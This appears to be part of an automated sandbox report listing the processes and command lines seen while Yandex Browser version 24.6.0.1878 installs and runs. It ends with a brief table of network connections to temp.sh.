C:\Windows\TEMP\sdwra_5632_436080900\service_update.exe

"C:\Windows\TEMP\sdwra_5632_436080900\service_update.exe" --setup

C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe

"C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe" --install

C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe

"C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe" --run-as-service

C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe

"C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://crash-reports.browser.yandex.net/submit --annotation=machine_id=a3028db1baffc0578427f8e443889a44 --annotation=main_process_pid=9544 --annotation=plat=Win32 --annotation=prod=Yandex --annotation=session_logout=False --annotation=ver=24.6.0.1878 --initial-client-data=0x13c,0x140,0x144,0x110,0x148,0x2ab728,0x2ab734,0x2ab740

C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe

"C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe" --update-scheduler

C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe

"C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe" --update-background-scheduler

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\clidmgr.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\clidmgr.exe" --appid=yabrowser --vendor-xml-path="C:\Users\Admin\AppData\Local\Temp\clids.xml"

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\clidmgr.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\clidmgr.exe" --appid=yabrowser --vendor-xml-path="C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\source5632_1102270951\Browser-bin\clids_yandex_second.xml"

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --progress-window=0 --install-start-time-no-uac=268071600

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Crashpad" --url=https://crash-reports.browser.yandex.net/submit --annotation=machine_id= --annotation=main_process_pid=9252 --annotation=metrics_client_id=eebb1e7f281049b7b63c8a71002f524a --annotation=plat=Win32 --annotation=prod=Yandex --annotation=session_logout=False --annotation=ver=24.6.0.1878 --initial-client-data=0xf4,0xf8,0xfc,0xc8,0x100,0x70f45a28,0x70f45a34,0x70f45a40

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=gpu-process --user-id=cd6fd94f-AB17-40A5-842C-61F58DF30afc --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --gpu-process-kind=sandboxed --field-trial-handle=1816,i,5844591098871488284,10895279794211445282,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=1812 /prefetch:2

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=gpu-process --user-id=cd6fd94f-AB17-40A5-842C-61F58DF30afc --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=disabled --gpu-process-kind=trampoline --field-trial-handle=1708,i,5844591098871488284,10895279794211445282,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=2028 /prefetch:2

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=ru --service-sandbox-type=none --user-id=cd6fd94f-AB17-40A5-842C-61F58DF30afc --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Network Service" --field-trial-handle=2016,i,5844591098871488284,10895279794211445282,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=2152 --brver=24.6.0.1878 /prefetch:3

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=ru --service-sandbox-type=service --user-id=cd6fd94f-AB17-40A5-842C-61F58DF30afc --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Storage Service" --field-trial-handle=2324,i,5844591098871488284,10895279794211445282,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=2336 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=ru --service-sandbox-type=audio --user-id=cd6fd94f-AB17-40A5-842C-61F58DF30afc --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Audio Service" --field-trial-handle=2844,i,5844591098871488284,10895279794211445282,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=2924 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=renderer --user-id=cd6fd94f-AB17-40A5-842C-61F58DF30afc --brand-id=yandex --partner-id=pseudoportal-ru --extension-process --help-url=https://api.browser.yandex.ru/redirect/help/ --user-agent-info --web-ntp-url-for-renderer=https://webntp.yandex.ru/ --translate-security-origin=https://browser.translate.yandex.net/ --enable-instaserp --no-appcompat-clear --enable-ignition --allow-prefetch --lang=ru --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3068,i,5844591098871488284,10895279794211445282,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=3064 /prefetch:2

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=renderer --user-id=cd6fd94f-AB17-40A5-842C-61F58DF30afc --brand-id=yandex --partner-id=pseudoportal-ru --help-url=https://api.browser.yandex.ru/redirect/help/ --user-agent-info --web-ntp-url-for-renderer=https://webntp.yandex.ru/ --translate-security-origin=https://browser.translate.yandex.net/ --enable-instaserp --no-appcompat-clear --enable-ignition --allow-prefetch --lang=ru --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=3536,i,5844591098871488284,10895279794211445282,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=3532 /prefetch:1

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=chrome.mojom.ProfileImport --lang=ru --service-sandbox-type=none --user-id=cd6fd94f-AB17-40A5-842C-61F58DF30afc --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Импорт профилей" --field-trial-handle=3500,i,5844591098871488284,10895279794211445282,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=3660 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=ru --service-sandbox-type=service --user-id=cd6fd94f-AB17-40A5-842C-61F58DF30afc --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Data Decoder Service" --field-trial-handle=3252,i,5844591098871488284,10895279794211445282,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=3508 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=renderer --user-id=cd6fd94f-AB17-40A5-842C-61F58DF30afc --brand-id=yandex --partner-id=pseudoportal-ru --help-url=https://api.browser.yandex.ru/redirect/help/ --user-agent-info --web-ntp-url-for-renderer=https://webntp.yandex.ru/ --translate-security-origin=https://browser.translate.yandex.net/ --enable-instaserp --no-appcompat-clear --enable-ignition --lang=ru --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=3660,i,5844591098871488284,10895279794211445282,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=3692 /prefetch:1

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=ru --service-sandbox-type=service --user-id=cd6fd94f-AB17-40A5-842C-61F58DF30afc --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Data Decoder Service" --field-trial-handle=3816,i,5844591098871488284,10895279794211445282,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=4156 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=gpu-process --user-id=cd6fd94f-AB17-40A5-842C-61F58DF30afc --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --gpu-process-kind=sandboxed --field-trial-handle=2020,i,5844591098871488284,10895279794211445282,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=4116 /prefetch:2

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=renderer --user-id=cd6fd94f-AB17-40A5-842C-61F58DF30afc --brand-id=yandex --partner-id=pseudoportal-ru --help-url=https://api.browser.yandex.ru/redirect/help/ --user-agent-info --web-ntp-url-for-renderer=https://webntp.yandex.ru/ --translate-security-origin=https://browser.translate.yandex.net/ --ya-custo-process --enable-instaserp --no-appcompat-clear --enable-ignition --disable-gpu-compositing --lang=ru --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=1960,i,5844591098871488284,10895279794211445282,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=3996 /prefetch:1

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=ru --service-sandbox-type=service --user-id=cd6fd94f-AB17-40A5-842C-61F58DF30afc --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Data Decoder Service" --field-trial-handle=3888,i,5844591098871488284,10895279794211445282,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=3900 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=renderer --user-id=cd6fd94f-AB17-40A5-842C-61F58DF30afc --brand-id=yandex --partner-id=pseudoportal-ru --help-url=https://api.browser.yandex.ru/redirect/help/ --user-agent-info --web-ntp-url-for-renderer=https://webntp.yandex.ru/ --translate-security-origin=https://browser.translate.yandex.net/ --ya-custo-process --enable-instaserp --no-appcompat-clear --enable-ignition --disable-gpu-compositing --lang=ru --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=4576,i,5844591098871488284,10895279794211445282,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=4592 /prefetch:1

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=renderer --user-id=cd6fd94f-AB17-40A5-842C-61F58DF30afc --brand-id=yandex --partner-id=pseudoportal-ru --help-url=https://api.browser.yandex.ru/redirect/help/ --user-agent-info --web-ntp-url-for-renderer=https://webntp.yandex.ru/ --translate-security-origin=https://browser.translate.yandex.net/ --enable-instaserp --no-appcompat-clear --enable-ignition --disable-gpu-compositing --lang=ru --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=5164,i,5844591098871488284,10895279794211445282,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=5160 /prefetch:1

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=ru --service-sandbox-type=service --user-id=cd6fd94f-AB17-40A5-842C-61F58DF30afc --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Распаковщик файлов" --field-trial-handle=5360,i,5844591098871488284,10895279794211445282,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=5368 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=ru --service-sandbox-type=service --user-id=cd6fd94f-AB17-40A5-842C-61F58DF30afc --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Data Decoder Service" --field-trial-handle=4936,i,5844591098871488284,10895279794211445282,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=5436 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=ru --service-sandbox-type=service --user-id=cd6fd94f-AB17-40A5-842C-61F58DF30afc --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Data Decoder Service" --field-trial-handle=5420,i,5844591098871488284,10895279794211445282,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=5440 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=ru --service-sandbox-type=service --user-id=cd6fd94f-AB17-40A5-842C-61F58DF30afc --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Data Decoder Service" --field-trial-handle=5520,i,5844591098871488284,10895279794211445282,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=5540 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=ru --service-sandbox-type=service --user-id=cd6fd94f-AB17-40A5-842C-61F58DF30afc --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Data Decoder Service" --field-trial-handle=5524,i,5844591098871488284,10895279794211445282,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=5548 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=ru --service-sandbox-type=service --user-id=cd6fd94f-AB17-40A5-842C-61F58DF30afc --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Data Decoder Service" --field-trial-handle=5368,i,5844591098871488284,10895279794211445282,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=5488 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=ru --service-sandbox-type=service --user-id=cd6fd94f-AB17-40A5-842C-61F58DF30afc --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Data Decoder Service" --field-trial-handle=5464,i,5844591098871488284,10895279794211445282,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=5408 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=ru --service-sandbox-type=service --user-id=cd6fd94f-AB17-40A5-842C-61F58DF30afc --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Data Decoder Service" --field-trial-handle=5500,i,5844591098871488284,10895279794211445282,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=5440 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=ru --service-sandbox-type=service --user-id=cd6fd94f-AB17-40A5-842C-61F58DF30afc --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Data Decoder Service" --field-trial-handle=5836,i,5844591098871488284,10895279794211445282,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=5840 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=ru --service-sandbox-type=service --user-id=cd6fd94f-AB17-40A5-842C-61F58DF30afc --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Data Decoder Service" --field-trial-handle=5784,i,5844591098871488284,10895279794211445282,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=5848 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=ru --service-sandbox-type=service --user-id=cd6fd94f-AB17-40A5-842C-61F58DF30afc --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Data Decoder Service" --field-trial-handle=5828,i,5844591098871488284,10895279794211445282,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=6024 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=ru --service-sandbox-type=service --user-id=cd6fd94f-AB17-40A5-842C-61F58DF30afc --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Data Decoder Service" --field-trial-handle=5820,i,5844591098871488284,10895279794211445282,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=5936 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=ru --service-sandbox-type=service --user-id=cd6fd94f-AB17-40A5-842C-61F58DF30afc --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Data Decoder Service" --field-trial-handle=6036,i,5844591098871488284,10895279794211445282,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=5892 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=ru --service-sandbox-type=service --user-id=cd6fd94f-AB17-40A5-842C-61F58DF30afc --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Распаковщик файлов" --field-trial-handle=5336,i,5844591098871488284,10895279794211445282,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=5516 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --broupdater --broupdater-origin=auto --bits_job_guid={53FD9F1A-B5B5-4642-B009-2AC33990B934}

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data" --url=https://crash-reports.browser.yandex.net/submit --annotation=install_date=1719179816 --annotation=last_update_date=1719179816 --annotation=launches_after_update=1 --annotation=machine_id=a3028db1baffc0578427f8e443889a44 --annotation=main_process_pid=1572 --annotation=metrics_client_id=eebb1e7f281049b7b63c8a71002f524a --annotation=micromode=broupdater --annotation=plat=Win32 --annotation=prod=Yandex --annotation=session_logout=False --annotation=ver=24.6.0.1878 --initial-client-data=0xf8,0xfc,0x100,0xcc,0x104,0x70f45a28,0x70f45a34,0x70f45a40

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=gpu-process --user-id=cd6fd94f-AB17-40A5-842C-61F58DF30afc --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --gpu-process-kind=sandboxed --field-trial-handle=1808,i,13501747830820339287,12889975122532335750,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=1804 /prefetch:2

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=ru --service-sandbox-type=none --user-id=cd6fd94f-AB17-40A5-842C-61F58DF30afc --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Network Service" --field-trial-handle=1936,i,13501747830820339287,12889975122532335750,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=1952 --brver=24.6.0.1878 /prefetch:3

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --broupdater-stat-bits --broupdater-stat-name=install --bits_job_guid={95A52657-79CE-4F32-ADBA-05B2F0438A7F}

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data" --url=https://crash-reports.browser.yandex.net/submit --annotation=install_date=1719179816 --annotation=last_update_date=1719179816 --annotation=launches_after_update=2 --annotation=machine_id=a3028db1baffc0578427f8e443889a44 --annotation=main_process_pid=3832 --annotation=metrics_client_id=eebb1e7f281049b7b63c8a71002f524a --annotation=plat=Win32 --annotation=prod=Yandex --annotation=session_logout=False --annotation=ver=24.6.0.1878 --initial-client-data=0xf8,0xfc,0x100,0xcc,0x104,0x70f45a28,0x70f45a34,0x70f45a40

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=gpu-process --user-id=cd6fd94f-AB17-40A5-842C-61F58DF30afc --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --gpu-process-kind=sandboxed --field-trial-handle=1792,i,6075720620835992658,10196605529921995734,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=1784 /prefetch:2

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=ru --service-sandbox-type=none --user-id=cd6fd94f-AB17-40A5-842C-61F58DF30afc --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Network Service" --field-trial-handle=1920,i,6075720620835992658,10196605529921995734,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=1936 --brver=24.6.0.1878 /prefetch:3

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=ru --service-sandbox-type=none --user-id=cd6fd94f-AB17-40A5-842C-61F58DF30afc --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Утилиты Windows" --field-trial-handle=3076,i,5844591098871488284,10895279794211445282,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=3100 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=ru --service-sandbox-type=none --user-id=cd6fd94f-AB17-40A5-842C-61F58DF30afc --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Утилиты Windows" --field-trial-handle=3060,i,5844591098871488284,10895279794211445282,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=3156 --brver=24.6.0.1878 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 temp.sh udp
FR 51.91.79.17:443 temp.sh tcp
FR 51.91.79.17:443 temp.sh tcp
